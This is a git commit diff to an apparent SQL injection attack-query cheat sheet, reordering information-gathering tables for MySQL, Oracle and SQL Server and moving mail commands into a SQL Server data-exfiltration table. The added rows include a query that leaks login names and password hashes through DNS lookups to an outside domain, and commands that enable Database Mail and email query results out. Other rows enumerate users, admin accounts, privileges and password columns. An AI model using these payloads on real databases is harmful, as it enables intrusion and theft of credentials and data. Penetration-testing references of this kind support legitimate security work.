Reformatting information gathering (#2)

JacobReynolds · web-flow · commit 2ed5667fc5d7 · 2018-02-20T21:51:31.000-06:00
Making the table structures consistent across all 3 DBMSs and moving xp_sendmail and sp_send_dbmail to Data Exfiltration for SQL Server
diff --git a/attackQueries/dataExfiltration/sqlserver.html b/attackQueries/dataExfiltration/sqlserver.html
@@ -4,19 +4,40 @@ <h3 id="data-exfiltration">Data Exfiltration</h3>
 
 <p><i>Note: It is possible to make a DNS request from MSSQL. However, this request requires administrator privileges and SQL Server 2005.</i></p>
 <table class="table table-striped table-hover">
-    <thead>
-        <tr>
-            <th>Description</th>
-            <th>Query</th>
-        </tr>
-    </thead>
-    <tbody>
-        <tr>
-            <td>Make DNS Request</td>
-            <td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
-        </tr>
-        <tr>
-          <td>UNC Path (DNS Request)</td>
-          <td>xp_dirtree ‘\\data.domain.com\file’</td>
-    </tbody>
+  <thead>
+    <tr>
+      <th>Description</th>
+      <th>Query</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td>Make DNS Request</td>
+      <td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
+    </tr>
+    <tr>
+      <td>UNC Path (DNS Request)</td>
+      <td>xp_dirtree ‘\\data.domain.com\file’</td>
+    </tr>
+    <tr>
+      <td>Enable sp_send_dbmail and send query</td>
+      <td>sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version';</td>
+    </tr>
+    <tr>
+      <td>Basic xp_sendmail Query</td>
+      <td>EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'</td>
+    </tr>
+    <tr>
+      <td>Send Full Email with xp_sendmail</td>
+      <td>EXEC xp_sendmail @recipients='harold@netspi.com',<br>@message='This is a test.',<br>@copy_recipients='test@netspi.com',<br>@subject='TEST'</td>
+    </tr>
+    <tr>
+      <td>Send Query Results Via xp_sendmail</td>
+      <td>EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';</td>
+    </tr>
+    <tr>
+      <td>Send Query Results as Attachment Via xp_sendmail</td>
+      <td>CREATE TABLE ##texttab (c1 text)<br>INSERT ##texttab values ('Put messge here.')<br>DECLARE @cmd varchar(56)<br>SET @cmd = 'SELECT c1 from ##texttab'<br>EXEC master.dbo.xp_sendmail 'robertk',<br>@query = @cmd, @no_header='TRUE'<br>DROP TABLE ##texttab</td>
+    </tr>
+  </tbody>
 </table>
diff --git a/attackQueries/informationGathering/mysql.html b/attackQueries/informationGathering/mysql.html
@@ -16,29 +16,37 @@ <h3 id="information-gathering">Information Gathering</h3>
       <td>Version</td>
       <td>SELECT @@version</td>
     </tr>
+    <tr>
+      <td>User</td>
+      <td>SELECT user()<br/>SELECT system_user()</td>
+    </tr>
     <tr>
       <td>Users</td>
-      <td>SELECT user FROM mysql.user<br>SELECT user();<br>SELECT system_user()<br>* SELECT Super_priv FROM mysql.user WHERE user= 'root' LIMIT 1,1</td>
+      <td>SELECT user FROM mysql.user<br/>* SELECT Super_priv FROM mysql.user WHERE user= 'root' LIMIT 1,1</td>
     </tr>
     <tr>
-      <td>Current Database</td>
-      <td>SELECT database()</td>
+      <td>Tables</td>
+      <td>SELECT table_schema, table_name FROM information_schema.tables</td>
+    </tr>
+    <tr>
+      <td>Columns</td>
+      <td>SELECT table_name, column_name FROM information_schema.columns</td>
     </tr>
     <tr>
       <td>Databases</td>
       <td>SELECT schema_name FROM information_schema.schemata<br></td>
     </tr>
     <tr>
-      <td>Tables</td>
-      <td>SELECT table_schema,table_name FROM information_schema.tables</td>
+      <td>Current Database Name</td>
+      <td>SELECT database()</td>
     </tr>
     <tr>
-      <td>Columns</td>
-      <td>SELECT table_schema, table_name, column_name FROM information_schema.columns</td>
+      <td>Query another Database</td>
+      <td>USE [database_name]; SELECT database();<br/>SELECT [column] FROM [database_name].[table_name]</td>
     </tr>
     <tr>
       <td>Number of Columns</td>
-      <td>SELECT * FROM USERS ORDER BY 1<br><br><em>Increase 1 until query returns false, previous number was the amount of columns</em></td>
+      <td>SELECT count(*) FROM information_schema.columns WHERE table_name = '[table_name]'</td>
     </tr>
     <tr>
       <td>DBA Accounts</td>
diff --git a/attackQueries/informationGathering/oracle.html b/attackQueries/informationGathering/oracle.html
@@ -25,29 +25,29 @@ <h3 id="information-gathering">Information Gathering</h3>
       <td>SELECT username FROM all_users ORDER BY username;<br>* SELECT name FROM sys.user$;</td>
     </tr>
     <tr>
-      <td>Current Database</td>
-      <td>SELECT global_name FROM global_name;<br>SELECT name FROM v database;
-        <br>SELECT instance_name FROM v$instance;<br>SELECT SYS.DATABASE_NAME FROM DUAL;</td>
-    </tr>
-    <tr>
-      <td>Databases</td>
-      <td>SELECT DISTINCT owner FROM all_tables;</td>
+      <td>Tables</td>
+      <td>SELECT table_name FROM all_tables;<br>SELECT owner, table_name FROM all_tables;</td>
     </tr>
     <tr>
-      <td>DBA Accounts</td>
-      <td>SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';</td>
+      <td>Tables From Column Name</td>
+      <td>SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';</td>
     </tr>
     <tr>
       <td>Columns</td>
       <td>SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';<br>SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';</td>
     </tr>
     <tr>
-      <td>Tables</td>
-      <td>SELECT table_name FROM all_tables;<br>SELECT owner, table_name FROM all_tables;</td>
+      <td>Current Database</td>
+      <td>SELECT global_name FROM global_name;<br>SELECT name FROM V$DATABASE;
+        <br>SELECT instance_name FROM V$INSTANCE;<br>SELECT SYS.DATABASE_NAME FROM DUAL;</td>
     </tr>
     <tr>
-      <td>Tables From Column Name</td>
-      <td>SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';</td>
+      <td>Databases</td>
+      <td>SELECT DISTINCT owner FROM all_tables;</td>
+    </tr>
+    <tr>
+      <td>DBA Accounts</td>
+      <td>SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';</td>
     </tr>
     <tr>
       <td>Privileges</td>
diff --git a/attackQueries/informationGathering/sqlserver.html b/attackQueries/informationGathering/sqlserver.html
@@ -15,28 +15,32 @@ <h3 id="information-gathering">Information Gathering</h3>
       <td>SELECT @@version;</td>
     </tr>
     <tr>
-      <td>Database Name</td>
-      <td>SELECT db_name();</td>
+      <td>User</td>
+      <td>SELECT user;<br>SELECT system_user;<br>SELECT user_name();<br>SELECT loginame from master..sysprocesses where spid = @@SPID</td>
     </tr>
     <tr>
-      <td>Databases</td>
-      <td>SELECT name from master..sysdatabases;</td>
+      <td>Users</td>
+      <td>SELECT name from master..syslogins</td>
     </tr>
     <tr>
-      <td>Server Name</td>
-      <td>SELECT @@SERVERNAME</td>
+      <td>Tables</td>
+      <td>SELECT table_catalog, table_name FROM information_schema.columns</td>
     </tr>
     <tr>
-      <td>Database Tables and Columns</td>
-      <td>SELECT table_name, column_name FROM information_schema.columns</td>
+      <td>Columns</td>
+      <td>SELECT table_catalog, column_name FROM information_schema.columns</td>
     </tr>
     <tr>
-      <td>Current Database User</td>
-      <td>SELECT user;<br>SELECT system_user;<br>SELECT user_name();<br>SELECT loginame from master..sysprocesses where spid = @@SPID</td>
+      <td>Databases</td>
+      <td>SELECT name from master..sysdatabases;</td>
     </tr>
     <tr>
-      <td>Users</td>
-      <td>SELECT name from master..syslogins</td>
+      <td>Database Name</td>
+      <td>SELECT db_name();</td>
+    </tr>
+    <tr>
+      <td>Server Name</td>
+      <td>SELECT @@SERVERNAME</td>
     </tr>
     <tr>
       <td>Find Stored Procedures</td>
@@ -60,7 +64,7 @@ <h3 id="information-gathering">Information Gathering</h3>
         t.target_set_id, t.TYPE, t.type_skeleton FROM msdb.dbo.syspolicy_policies p INNER JOIN syspolicy_conditions c ON p.condition_id = c.condition_id INNER JOIN msdb.dbo.syspolicy_target_sets t ON t.object_set_id = p.object_set_id</td>
     </tr>
     <tr>
-      <td>Get SQL Domain User</td>
+      <td>Domain User</td>
       <td><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/templates/tsql/Get-SQLDomainUser-Example.sql">https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/templates/tsql/Get-SQLDomainUser-Example.sql</a></td>
     </tr>
     <tr>
@@ -74,40 +78,20 @@ <h3 id="information-gathering">Information Gathering</h3>
         s ON a.audit_guid = s.audit_guid JOIN sys.server_audit_specification_details AS d ON s.server_specification_id = d.server_specification_id</td>
     </tr>
     <tr>
-      <td>View queries run on the system</td>
+      <td>Query history</td>
       <td>SELECT * FROM (SELECT COALESCE(OBJECT_NAME(qt.objectid),'Ad-Hoc') AS objectname, qt.objectid as objectid, last_execution_time, execution_count, encrypted,<br/> (SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset
         = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) <br/>ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement FROM sys.dm_exec_query_stats AS qs CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x ORDER BY execution_count
         DESC
       </td>
     </tr>
     <tr>
-      <td>List enabled audit specifications</td>
+      <td>Enabled audit specifications</td>
       <td><a href="https://gist.github.com/nullbind/5da8b5113da007ba0111" target="_blank" rel="noopener">https://gist.github.com/nullbind/5da8b5113da007ba0111</a></td>
     </tr>
     <tr>
       <td>Local Administrators in Sysadmin Role</td>
       <td>SELECT is_srvrolemember('sysadmin','BUILTIN\Administrators')</td>
     </tr>
-    <tr>
-      <td>Enable database mail</td>
-      <td>sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version';</td>
-    </tr>
-    <tr>
-      <td>Basic xp_sendmail Query</td>
-      <td>EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'</td>
-    </tr>
-    <tr>
-      <td>Send Full Email with xp_sendmail</td>
-      <td>EXEC xp_sendmail @recipients='harold@netspi.com',<br>@message='This is a test.',<br>@copy_recipients='test@netspi.com',<br>@subject='TEST'</td>
-    </tr>
-    <tr>
-      <td>Send Query Results Via xp_sendmail</td>
-      <td>EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';</td>
-    </tr>
-    <tr>
-      <td>Send Query Results as Attachment Via xp_sendmail</td>
-      <td>CREATE TABLE ##texttab (c1 text)<br>INSERT ##texttab values ('Put messge here.')<br>DECLARE @cmd varchar(56)<br>SET @cmd = 'SELECT c1 from ##texttab'<br>EXEC master.dbo.xp_sendmail 'robertk',<br>@query = @cmd, @no_header='TRUE'<br>DROP TABLE ##texttab</td>
-    </tr>
     <tr>
       <td>Domain users and LDAP queries via database links and openrowset</td>
       <td><a href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/Get-SQLDomainUser-Example.sql" target="_blank" rel="noopener">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/Get-SQLDomainUser-Example.sql</a></td>
